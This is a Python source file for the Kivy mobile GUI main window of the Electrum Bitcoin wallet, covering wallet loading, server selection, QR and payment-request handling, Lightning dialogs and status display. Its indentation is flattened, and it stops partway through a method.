# main_window.py
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down; the timeout is set to forever
# so the data stays cached
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
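# Parse an 'amount unit' string (e.g. '0.001 BTC') into an integer number of
# satoshis; returns None if the numeric part cannot be parsed.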
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Screen orientation the app is currently displayed in.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that wallet/status/history updates happen at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
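# Handle a verified BIP70 payment request: reject it if it is already paid or
# has expired, otherwise show it on the send screen.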
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
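# Android-only: start SimpleScannerActivity and deliver the scanned text to
# on_complete once the activity returns.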
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
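# With the storage decrypted, load the wallet db; if the db format is outdated,
# run the install wizard to upgrade it first.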
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
app.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might not have focus,
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
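# Estimate the maximum spendable amount: draft a send-all ('!') transaction and
# subtract any extra fee reported by plugins via the 'get_tx_extra_fee' hook.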
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
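# On resume, require the PIN again if one is set and the app was paused for
# more than 5 minutes.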
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
